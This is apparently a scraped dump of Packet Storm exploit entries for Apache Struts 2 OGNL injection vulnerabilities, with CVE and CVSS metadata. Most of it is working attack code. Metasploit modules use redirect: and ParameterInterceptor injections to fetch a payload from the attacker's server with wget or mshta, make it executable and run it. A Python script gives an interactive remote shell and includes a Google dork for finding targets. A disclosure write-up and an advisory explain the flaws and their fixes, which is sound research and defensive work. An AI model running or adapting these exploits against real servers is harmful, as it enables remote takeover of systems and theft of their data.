normalize_uri(target_uri.path) \nres = send_request_cgi({ \n'uri' => uri, \n'method' => 'GET' \n}) \n \nif res.nil? or res.code != 200 \nfail_with(Exploit::Failure::NoTarget, \"#{rhost}:#{rport} - In order to autodetect, a valid action, returning 200, must be provided as TARGETURI, returning 200\") \nend \n \nproof = rand_text_alpha(6 + rand(4)) \n \nres = send_request_cgi({ \n'uri' => \"#{uri}?redirect:%25{new%20java.io.File('.').getCanonicalPath().concat('#{proof}')}\", \n'method' => 'GET' \n}) \n \nif res and res.code == 302 and res.headers['Location'] =~ /#{proof}/ \nif res.headers['Location'] =~ /:\\\\/ \nreturn targets[1] # Windows \nelse \nreturn targets[2] # Linux \nend \nend \n \nfail_with(Exploit::Failure::NoTarget, \"#{rhost}:#{rport} - Target auto-detection didn't work\") \n \nend \n \ndef exploit_linux \n \ndownfile = rand_text_alpha(8+rand(8)) \n@pl = @exe \n@pl_sent = false \n \n# \n# start HTTP service if necessary \n# \nservice_url = start_http_service \n \n# \n# download payload \n# \nfname = datastore['WritableDir'] \nfname = \"#{fname}/\" unless fname =~ %r'/$' \nfname << downfile \nuri = normalize_uri(target_uri.path) \nuri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'wget','#{service_url}','-O',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\" \n \nprint_status(\"#{rhost}:#{rport} - Downloading payload to #{fname}...\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => uri \n}) \n \nif res.nil? or res.code != 302 \nfail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\") \nend \n \n# \n# wait for payload download \n# \nwait_payload \n \nregister_file_for_cleanup(fname) \n \n# \n# chmod \n# \nuri = normalize_uri(target_uri.path) \nuri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'chmod','777',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\" \n \nprint_status(\"#{rhost}:#{rport} - Make payload executable...\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => uri \n}) \n \nif res.nil? or res.code != 302 \nfail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\") \nend \n \n# \n# execute \n# \nuri = normalize_uri(target_uri.path) \nuri << \"?redirect:%25{(new%20java.lang.ProcessBuilder(new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f'))).start()}\" \n \nprint_status(\"#{rhost}:#{rport} - Execute payload...\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => uri \n}) \n \nif res.nil? or res.code != 302 \nfail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\") \nend \n \nend \n \ndef exploit_windows \n@var_exename = rand_text_alpha(4 + rand(4)) + '.exe' \n@pl = build_hta \n@pl_sent = false \n \n# \n# start HTTP service if necessary \n# \nservice_url = start_http_service \n \n# \n# execute hta \n# \nuri = normalize_uri(target_uri.path) \nuri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'mshta',new%20java.lang.String('http:nn#{service_url}').replace('n','\\\\u002f')})).start()}\" \n \nprint_status(\"#{rhost}:#{rport} - Execute payload through malicious HTA...\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => uri \n}) \n \nif res.nil? or res.code != 302 \nfail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\") \nend \n \n# \n# wait for payload download \n# \nwait_payload \n \nregister_file_for_cleanup(@var_exename) \nend \n \ndef exploit \nif target.name =~ /Automatic/ \nprint_status(\"#{rhost}:#{rport} - Target autodetection...\") \nmy_target = auto_target \nprint_good(\"#{rhost}:#{rport} - #{my_target.name} target found!\") \nelse \nmy_target = target \nend \n \np = exploit_regenerate_payload(my_target.platform, my_target.arch) \n@exe = generate_payload_exe({:code => p.encoded, :platform => my_target.platform, :arch => my_target.arch}) \n \nif my_target.name =~ /Linux/ \nif datastore['PAYLOAD'] =~ /windows/ \nfail_with(Exploit::Failure::BadConfig, \"#{rhost}:#{rport} - The target is Linux, but you've selected a Windows payload!\") \nend \nexploit_linux \nelsif my_target.name =~ /Windows/ \nif datastore['PAYLOAD'] =~ /linux/ \nfail_with(Exploit::Failure::BadConfig, \"#{rhost}:#{rport} - The target is Windows, but you've selected a Linux payload!\") \nend \nexploit_windows \nend \nend \n \n# Handle incoming requests from the server \ndef on_request_uri(cli, request) \nvprint_status(\"#{rhost}:#{rport} - URI requested: #{request.inspect}\") \nif (not @pl) \nprint_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\") \nreturn \nend \nprint_status(\"#{rhost}:#{rport} - Sending the payload to the server...\") \n@pl_sent = true \nsend_response(cli, @pl) \nend \n \n# wait for the data to be sent \ndef wait_payload \nprint_status(\"#{rhost}:#{rport} - Waiting for the victim to request the payload...\") \n \nwaited = 0 \nwhile (not @pl_sent) \nselect(nil, nil, nil, 1) \nwaited += 1 \nif (waited > datastore['HTTP_DELAY']) \nfail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?\") \nend \nend \nend \n \ndef build_hta \nvar_shellobj = rand_text_alpha(rand(5)+5); \nvar_fsobj = rand_text_alpha(rand(5)+5); \nvar_fsobj_file = rand_text_alpha(rand(5)+5); \nvar_vbsname = rand_text_alpha(rand(5)+5); \nvar_writedir = rand_text_alpha(rand(5)+5); \n \nvar_origLoc = rand_text_alpha(rand(5)+5); \nvar_byteArray = rand_text_alpha(rand(5)+5); \nvar_writestream = rand_text_alpha(rand(5)+5); \nvar_strmConv = rand_text_alpha(rand(5)+5); \n \n# Doing in this way to bypass the ADODB.Stream restrictions on JS, \n# even when executing it as an \"HTA\" application \n# The encoding code has been stolen from ie_unsafe_scripting.rb \nprint_status(\"#{rhost}:#{rport} - Encoding payload into vbs/javascript/hta...\"); \n \n# Build the content that will end up in the .vbs file \nvbs_content = Rex::Text.to_hex(%Q| \nDim #{var_origLoc}, s, #{var_byteArray} \n#{var_origLoc} = SetLocale(1033) \n|) \n# Drop the exe payload into an ansi string (ansi ensured via SetLocale above) \n# for conversion with ADODB.Stream \nvbs_ary = [] \n# The output of this loop needs to be as small as possible since it \n# gets repeated for every byte of the executable, ballooning it by a \n# factor of about 80k (the current size of the exe template). In its \n# current form, it's down to about 4MB on the wire \n@exe.each_byte do |b| \nvbs_ary << Rex::Text.to_hex(\"s=s&Chr(#{(\"%d\" % b)})\\n\") \nend \nvbs_content << vbs_ary.join(\"\") \n \n# Continue with the rest of the vbs file; \n# Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent \n# Then use ADODB.Stream again to write the binary to file. \n#print_status(\"Finishing vbs...\"); \nvbs_content << Rex::Text.to_hex(%Q| \nDim #{var_strmConv}, #{var_writedir}, #{var_writestream} \n#{var_writedir} = WScript.CreateObject(\"WScript.Shell\").ExpandEnvironmentStrings(\"%TEMP%\") & \"\\\\#{@var_exename}\" \n \nSet #{var_strmConv} = CreateObject(\"ADODB.Stream\") \n \n#{var_strmConv}.Type = 2 \n#{var_strmConv}.Charset = \"x-ansi\" \n#{var_strmConv}.Open \n#{var_strmConv}.WriteText s, 0 \n#{var_strmConv}.Position = 0 \n#{var_strmConv}.Type = 1 \n#{var_strmConv}.SaveToFile #{var_writedir}, 2 \n \nSetLocale(#{var_origLoc})|) \n \nhta = <<-EOS \n<script> \nvar #{var_shellobj} = new ActiveXObject(\"WScript.Shell\"); \nvar #{var_fsobj} = new ActiveXObject(\"Scripting.FileSystemObject\"); \nvar #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings(\"%TEMP%\"); \nvar #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\",2,true); \n \n#{var_fsobj_file}.Write(unescape(\"#{vbs_content}\")); \n#{var_fsobj_file}.Close(); \n \n#{var_shellobj}.run(\"wscript.exe \" + #{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\", 1, true); \n#{var_shellobj}.run(#{var_writedir} + \"\\\\\\\\\" + \"#{@var_exename}\", 0, false); \n#{var_fsobj}.DeleteFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\"); \nwindow.close(); \n</script> \nEOS \n \nreturn hta \nend \n \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/122541/struts_default_action_mapper.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-20T20:45:40", "description": "", "cvss3": {}, "published": "2020-10-20T00:00:00", "type": "packetstorm", "title": "Apache Struts 2 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-2251"], "modified": "2020-10-20T00:00:00", "id": "PACKETSTORM:159629", "href": "https://packetstormsecurity.com/files/159629/Apache-Struts-2-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution \n# Google Dork: ext:action | filetype:action \n# Date: 2020/09/09 \n# Exploit Author: Jonatas Fil \n# Vendor Homepage: http://struts.apache.org/release/2.3.x/docs/s2-016.html \n# Version: <= 2.3.15 \n# Tested on: Linux \n# CVE : CVE-2013-2251 \n \n#!/usr/bin/python \n# \n# coding=utf-8 \n# \n# Struts 2 DefaultActionMapper Exploit [S2-016] \n# Interactive Shell for CVE-2013-2251 \n# \n# The Struts 2 DefaultActionMapper supports a method for short-circuit \nnavigation state changes by prefixing parameters with \n# \"action:\" or \"redirect:\", followed by a desired navigational target \nexpression. This mechanism was intended to help with \n# attaching navigational information to buttons within forms. \n# \n# https://struts.apache.org/docs/s2-016.html \n# Jonatas Fil (@exploitation) \n \nimport requests \nimport sys \nimport readline \n \n \n# Disable SSL \nrequests.packages.urllib3.disable_warnings() \n \n# ShellEvil \nif len(sys.argv) == 2: \ntarget = sys.argv[1] # Payload \nfirst = target + \n\"?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','\" \nsecond = \n\"'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}\" \nloop = 1 \nwhile loop == 1: \ncmd = raw_input(\"$ \") \nwhile cmd.strip() == '': \ncmd = raw_input(\"$ \") \nif cmd.strip() == '\\q': \nprint(\"Exiting...\") \nsys.exit() \ntry: \nheaders = {\"User-Agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64) \nAppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36\"} \npwn=requests.get(first+cmd+second,headers = \nheaders,verify=False) # Disable SSL \nif pwn.status_code == 200: \nprint pwn.content # 1337 \nelse: \nprint(\"Not Vuln !\") \nsys.exit() \nexcept Exception,e: \nprint e \nprint(\"Exiting...\") \nsys.exit() \n \nelse: # BANNER \nprint(''' \n__ _ _ _ __ _ _ \n/ _\\ |__ ___| | | /__\\_ _(_) | \n\\ \\| '_ \\ / _ \\ | |/_\\ \\ \\ / / | | \n_\\ \\ | | | __/ | //__ \\ V /| | | \n\\__/_| |_|\\___|_|_\\__/ \\_/ |_|_| \n \nby Jonatas Fil [@explotation] \n''') \nprint(\"======================================================\") \nprint(\"# Struts 2 DefaultActionMapper Exploit [S2-016] #\") \nprint(\"# USO: python struts.py http://site.com:8080/xxx.action #\") \nprint(\"======================================================\") \nprint(\"bye\") \nsys.exit() \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/159629/apachestrust2dam-exec.txt", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-12-05T22:21:06", "description": "", "cvss3": {}, "published": "2010-07-14T00:00:00", "type": "packetstorm", "title": "Struts2/XWork Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-1870"], "modified": "2010-07-14T00:00:00", "id": "PACKETSTORM:91774", "href": "https://packetstormsecurity.com/files/91774/Struts2-XWork-Remote-Command-Execution.html", "sourceData": "`Friday, July 9, 2010 \nCVE-2010-1870: Struts2/XWork remote command execution \nUpdate Tue Jul 13 2010: Added proof of concept \n \nApache Struts team has announced uploaded but has not released, due to an unreasonably prolonged voting process, the 2.2.0 release of the Struts2 web framework which fixes vulnerability that I've reported to them on May 31st 2010. Apache Struts team is ridiculously slow in releasing the fixed version and all of my attempts to expedite the process have failed. \n \nIntroduction \nStruts2 is Struts + WebWork. WebWork in turn uses XWork to invoke actions and call appropriate setters/getters based on HTTP parameter names, which is achieved by treating each HTTP parameter name as an OGNL statement. OGNL (Object Graph Navigation Language) is what turns: \n \nuser.address.city=Bishkek&user['favoriteDrink']=kumys \n \ninto \n \naction.getUser().getAddress().setCity(\"Bishkek\") \naction.getUser().setFavoriteDrink(\"kumys\") \n \nThis is performed by the ParametersInterceptor, which calls ValueStack.setValue() with user-supplied HTTP parameters as arguments. \nNOTE: If you are using XWork's ParametersInterceptor or operate with OGNL ValueStack in a similar way then you are vulnerable (ParametersInterceptor is on by default in struts-default.xml). \n \nIn addition to property getting/setting, OGNL supports many more features: \n \n* Method calling: foo() \n* Static method calling: @java.lang.System@exit(1) \n* Constructor calling: new MyClass() \n* Ability to work with context variables: #foo = new MyClass() \n* And more... \n \nSince HTTP parameter names are OGNL statements, to prevent an attacker from calling arbitrary methods via HTTP parameters XWork has the following two variables guarding methods execution: \n \n* OgnlContext's property 'xwork.MethodAccessor.denyMethodExecution' (set to true by default) \n* SecurityMemberAccess private field called 'allowStaticMethodAccess' (set to false by default) \n \nOGNL Context variables \nTo make it easier for developer to access various frequently needed objects XWork provides several predefined context variables: \n \n* #application \n* #session \n* #request \n* #parameters \n* #attr \n \nThese variables represent various server-side objects, such as session map. To prevent attackers from tampering with server-side objects XWork's ParametersInterceptor disallowed # in parameter names. About a year ago I found a way to bypass that protection(XW-641) using Java's unicode String representation: \\u0023. At the time I felt like the fix that was implemented (OGNL value stack clearing) was insufficient, but had not time to investigate this further. \n \nCVE-2010-1870 \nEarlier this year I finally got a chance to look at this again and found that in addition to the above mentioned context variables there were more: \n \n* #context - OgnlContext, the one guarding method execution based on 'xwork.MethodAccessor.denyMethodExecution' property value. \n* #_memberAccess - SecurityMemberAccess, whose 'allowStaticAccess' field prevented static method execution. \n* #root \n* #this \n* #_typeResolver \n* #_classResolver \n* #_traceEvaluations \n* #_lastEvaluation \n* #_keepLastEvaluation \n \nYou can probably see the problem already. Using XW-641 trick I was able to modify the values that were guarding Java methods execution and run arbitrary Java code: \n \n#_memberAccess['allowStaticMethodAccess'] = true \n#foo = new java .lang.Boolean(\"false\") \n#context['xwork.MethodAccessor.denyMethodExecution'] = #foo \n#rt = @java.lang.Runtime@getRuntime() \n#rt.exec('mkdir /tmp/PWNED') \n \nActual proof of concept had to use OGNL's expression evaluation when crafting HTTP request. PoC for this bug will be published on July 12 2010. To test whether your application is vulnerable you can use the following proof of concept, which will call java.lang.Runtime.getRuntime().exit(1): \n \n \nhttp://mydomain/MyStruts.action?('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true&(aaa)(('\\u0023context[\\'xwork.MethodAccessor.den \nyMethodExecution\\']\\u003d\\u0023foo')(\\u0023foo\\u003dnew%20java.lang.Boolean(\"false\")))&(asdf)(('\\u0023rt.exit(1)')(\\u0023rt\\u003d@java.lang.Runtime@getRunti \nme()))=1 \n \n \nFixing CVE-2010-1870 \nStruts2 users must upgrade to the 2.2.0, which whitelists a set of characters that excludes characters required to exploit this vulnerability. \n \n \nIn cases where upgrade isn't possible you can use ParameterInterceptor's \"excludeParams\" parameter to whitelist the characters required for your application to operate correctly(usually A-z0-9_.'\"[]) alternatively you can blacklist \\()@ which are the characters required to exploit this bug. \n \nTimeline \nMay 31st - email to security@struts.apache.org with vulnerability report. \nJune 4th - no response received, contacted developers again. \nJune 5th - had to find an XWork developer on IRC to look at this. \nJune 16th - Atlassian fixes vulnerability in its products. Atlassian and Struts developers worked together in coming up with the fix. \nJune 20th - 1-line fix commited \nJune 29th - Struts 2.2.0 release voting process started and is still going... \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/91774/struts2xwork-exec.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-12-05T22:12:15", "description": "", "cvss3": {}, "published": "2011-08-19T00:00:00", "type": "packetstorm", "title": "Apache Struts < 2.2.0 Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-1870"], "modified": "2011-08-19T00:00:00", "id": "PACKETSTORM:104227", "href": "https://packetstormsecurity.com/files/104227/Apache-Struts-2.2.0-Remote-Command-Execution.html", "sourceData": "`## \n# $Id: struts_code_exec.rb 13586 2011-08-19 05:59:32Z bannedit $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::CmdStagerTFTP \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts < 2.2.0 Remote Command Execution', \n'Description' => %q{ \nThis module exploits a remote command execution vulnerability in \nApache Struts versions < 2.2.0. This issue is caused by a failure to properly \nhandle unicode characters in OGNL extensive expressions passed to the web server. \n \nBy sending a specially crafted request to the Struts application it is possible to \nbypass the \"#\" restriction on ParameterInterceptors by using OGNL context variables. \nBypassing this restriction allows for the execution of arbitrary Java code. \n}, \n'Author' => \n[ \n'bannedit', # metasploit module \n'Meder Kydyraliev', # original public exploit \n], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 13586 $', \n'References' => \n[ \n[ 'CVE', '2010-1870'], \n[ 'OSVDB', '66280'], \n[ 'URL', 'http://www.exploit-db.com/exploits/14360/' ], \n], \n'Platform' => [ 'win', 'linux'], \n'Privileged' => true, \n'Targets' => \n[ \n['Windows Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win' \n} \n], \n['Linux Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n} \n], \n], \n'DisclosureDate' => 'Jul 13 2010', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('URI', [ true, 'The path to a struts application action ie. /struts2-blank-2.0.9/example/HelloWorld.action', \"\"]), \nOptString.new('CMD', [ false, 'Execute this command instead of using command stager', \"\" ]) \n], self.class) \nend \n \ndef execute_command(cmd, opts = {}) \nuri = Rex::Text::uri_encode(datastore['URI']) \nvar_a = rand_text_alpha_lower(4) \nvar_b = rand_text_alpha_lower(2) \nvar_c = rand_text_alpha_lower(4) \nvar_d = rand_text_alpha_lower(4) \nvar_e = rand_text_alpha_lower(4) \n \nuri << \"?(%27\\\\u0023_memberAccess[\\\\%27allowStaticMethodAccess\\\\%27]%27)(#{var_a})=true&\" \nuri << \"(aaaa)((%27\\\\u0023context[\\\\%27xwork.MethodAccessor.denyMethodExecution\\\\%27]\\\\u003d\\\\u0023#{var_c}%27)(\\\\u0023#{var_c}\\\\u003dnew%20java.lang.Boolean(\\\"false\\\")))&\" \nuri << \"(#{var_b})((%27\\\\u0023#{var_d}.exec(\\\"CMD\\\")%27)(\\\\u0023#{var_d}\\\\u003d@java.lang.Runtime@getRuntime()))=1\" if target['Platform'] == 'win' \nuri << \"(asdf)(('\\\\u0023rt.exec(\\\"CMD\\\".split(\\\"@\\\"))')(\\\\u0023rt\\\\u003d@java.lang.Runtime@getRuntime()))=1\" if target['Platform'] == 'linux' \nuri.gsub!(/CMD/, Rex::Text::uri_encode(cmd)) \n \nvprint_status(\"Attemping to execute: #{cmd}\") \n \nresp = send_request_raw({ \n'uri' => uri, \n'version' => '1.1', \n'method' => 'GET', \n}, 5) \nend \n \ndef windows_stager \nexe_fname = rand_text_alphanumeric(4+rand(4)) + \".exe\" \n \nprint_status(\"Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}\") \nexecute_cmdstager({ :temp => '.'}) \n@payload_exe = payload_exe \n \nprint_status(\"Attempting to execute the payload...\") \nexecute_command(@payload_exe) \nend \n \ndef linux_stager \ncmds = \"/bin/sh@-c@echo LINE | tee FILE\" \nexe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) \nbase64 = Rex::Text.encode_base64(exe) \nbase64.gsub!(/\\=/, \"\\\\u003d\") \nfile = rand_text_alphanumeric(4+rand(4)) \n \nexecute_command(\"/bin/sh@-c@touch /tmp/#{file}.b64\") \ncmds.gsub!(/FILE/, \"/tmp/\" + file + \".b64\") \nbase64.each_line do |line| \nline.chomp! \ncmd = cmds \ncmd.gsub!(/LINE/, line) \nexecute_command(cmds) \nend \n \nexecute_command(\"/bin/sh@-c@base64 -d /tmp/#{file}.b64|tee /tmp/#{file}\") \nexecute_command(\"/bin/sh@-c@chmod +x /tmp/#{file}\") \nexecute_command(\"/bin/sh@-c@rm /tmp/#{file}.b64\") \n \nexecute_command(\"/bin/sh@-c@/tmp/#{file}\") \n@payload_exe = \"/tmp/\" + file \nend \n \ndef on_new_session(client) \nif target['Platform'] == 'linux' \nprint_status(\"deleting #{@payload_exe} payload file\") \nexecute_command(\"/bin/sh@-c@rm #{@payload_exe}\") \nelse \nprint_status(\"Windows does not allow running executables to be deleted\") \nprint_status(\"delete the #{@payload_exe} file manually after migrating\") \nend \nend \n \ndef exploit \nif not datastore['CMD'].empty? \nprint_status(\"Executing user supplied command\") \nexecute_command(datastore['CMD']) \nreturn \nend \n \ncase target['Platform'] \nwhen 'linux' \nlinux_stager \nwhen 'win' \nwindows_stager \nelse \nraise RuntimeError, 'Unsupported target platform!' \nend \n \nhandler \nend \nend`\n", "sourceHref": "https://packetstormsecurity.com/files/download/104227/struts_code_exec.rb.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-12-05T22:12:59", "description": "", "cvss3": {}, "published": "2012-06-05T00:00:00", "type": "packetstorm", "title": "Apache Struts 2.2.1.1 Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0391"], "modified": "2012-06-05T00:00:00", "id": "PACKETSTORM:113272", "href": "https://packetstormsecurity.com/files/113272/Apache-Struts-2.2.1.1-Remote-Command-Execution.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::CmdStagerTFTP \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts <= 2.2.1.1 Remote Command Execution', \n'Description' => %q{ \nThis module exploits a remote command execution vulnerability in \nApache Struts versions < 2.2.1.1. This issue is caused because the \nExceptionDelegator interprets parameter values as OGNL expressions \nduring certain exception handling for mismatched data types of properties, \nwhich allows remote attackers to execute arbitrary Java code via a \ncrafted parameter. \n}, \n'Author' => \n[ \n'Johannes Dahse', # Vulnerability discovery and PoC \n'Andreas Nusser', # Vulnerability discovery and PoC \n'juan vazquez', # Metasploit module \n'sinn3r' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: $', \n'References' => \n[ \n[ 'CVE', '2012-0391'], \n[ 'OSVDB', '78277'], \n[ 'EDB', '18329'], \n[ 'URL', 'https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt'] \n], \n'Platform' => [ 'win', 'linux'], \n'Privileged' => true, \n'Targets' => \n[ \n['Windows Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win' \n} \n], \n['Linux Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n} \n], \n], \n'DisclosureDate' => 'Jan 06 2012', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'The path to a struts application action and the parameter to inject ie. /HelloWorldStruts2/hello?name=test&id=INJECT', \"\"]), \nOptString.new('CMD', [ false, 'Execute this command instead of using command stager', \"\" ]) \n], self.class) \nend \n \ndef execute_command(cmd, opts = {}) \n \nuri = String.new(datastore['TARGETURI']) \nuri.gsub!(/INJECT/, \"'%2b(%23_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,@java.lang.Runtime@getRuntime().exec(\\\"CMD\\\"))%2b'\") if target['Platform'] == 'win' \nuri.gsub!(/INJECT/, \"'%2b(%23_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,@java.lang.Runtime@getRuntime().exec(\\\"CMD\\\".split(\\\"@\\\")))%2b'\") if target['Platform'] == 'linux' \nuri.gsub!(/CMD/, Rex::Text::uri_encode(cmd)) \n \nvprint_status(\"Attempting to execute: #{cmd}\") \n \nresp = send_request_raw({ \n'uri' => uri, \n'version' => '1.1', \n'method' => 'GET', \n}, 5) \n \nend \n \ndef windows_stager \nexe_fname = rand_text_alphanumeric(4+rand(4)) + \".exe\" \n \nprint_status(\"Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}\") \nexecute_cmdstager({ :temp => '.'}) \n@payload_exe = payload_exe \n \nprint_status(\"Attempting to execute the payload...\") \nexecute_command(@payload_exe) \nend \n \ndef linux_stager \ncmds = \"/bin/sh@-c@echo LINE | tee FILE\" \nexe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) \nbase64 = Rex::Text.encode_base64(exe) \nbase64.gsub!(/\\=/, \"\\\\u003d\") \nfile = rand_text_alphanumeric(4+rand(4)) \n \nexecute_command(\"/bin/sh@-c@touch /tmp/#{file}.b64\") \ncmds.gsub!(/FILE/, \"/tmp/\" + file + \".b64\") \nbase64.each_line do |line| \nline.chomp! \ncmd = cmds \ncmd.gsub!(/LINE/, line) \nexecute_command(cmds) \nend \n \nexecute_command(\"/bin/sh@-c@base64 -d /tmp/#{file}.b64|tee /tmp/#{file}\") \nexecute_command(\"/bin/sh@-c@chmod +x /tmp/#{file}\") \nexecute_command(\"/bin/sh@-c@rm /tmp/#{file}.b64\") \n \nexecute_command(\"/bin/sh@-c@/tmp/#{file}\") \n@payload_exe = \"/tmp/\" + file \nend \n \ndef on_new_session(client) \nif target['Platform'] == 'linux' \nprint_status(\"Deleting #{@payload_exe} payload file\") \nexecute_command(\"/bin/sh@-c@rm #{@payload_exe}\") \nelse \nprint_status(\"Windows does not allow running executables to be deleted\") \nprint_status(\"Delete the #{@payload_exe} file manually after migrating\") \nend \nend \n \ndef exploit \nif not datastore['CMD'].empty? \nprint_status(\"Executing user supplied command\") \nexecute_command(datastore['CMD']) \nreturn \nend \n \ncase target['Platform'] \nwhen 'linux' \nlinux_stager \nwhen 'win' \nwindows_stager \nelse \nraise RuntimeError, 'Unsupported target platform!' \nend \n \nhandler \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/113272/struts_code_exec_exception_delegator.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:20:27", "description": "", "cvss3": {}, "published": "2013-08-13T00:00:00", "type": "packetstorm", "title": "Struts2 2.3.15 OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-2248", "CVE-2013-2251"], "modified": "2013-08-13T00:00:00", "id": "PACKETSTORM:122796", "href": "https://packetstormsecurity.com/files/122796/Struts2-2.3.15-OGNL-Injection.html", "sourceData": "`CVE Number: CVE-2013-2251 \nTitle: Struts2 Prefixed Parameters OGNL Injection Vulnerability \nAffected Software: Apache Struts v2.0.0 - 2.3.15 \nCredit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc. \nIssue Status: v2.3.15.1 was released which fixes this vulnerability \nIssue ID by Vender: S2-016 \n \nOverview: \nStruts2 is an open-source web application framework for Java. \nStruts2 (v2.0.0 - 2.3.15) is vulnerable to remote OGNL injection which \nleads to arbitrary Java method execution on the target server. This is \ncaused by insecure handling of prefixed special parameters (action:, \nredirect: and redirectAction:) in DefaultActionMapper class of Struts2. \n \nDetails: \n<About DefaultActionMapper> \n \nStruts2's ActionMapper is a mechanism for mapping between incoming HTTP \nrequest and action to be executed on the server. DefaultActionMapper is \na default implementation of ActionMapper. It handles four types of \nprefixed parameters: action:, redirect:, redirectAction: and method:. \n \nFor example, redirect prefix is used for HTTP redirect. \n \nNormal redirect prefix usage in JSP: \n<s:form action=\"foo\"> \n... \n<s:submit value=\"Register\"/> \n<s:submit name=\"redirect:http://www.google.com/\" value=\"Cancel\"/> \n</s:form> \n \nIf the cancel button is clicked, redirection is performed. \n \nRequest URI for redirection: \n/foo.action?redirect:http://www.google.com/ \n \nResopnse Header: \nHTTP/1.1 302 Found \nLocation: http://www.google.com/ \n \nUsage of other prefixed parameters is similar to redirect. \nSee Struts2 document for details. 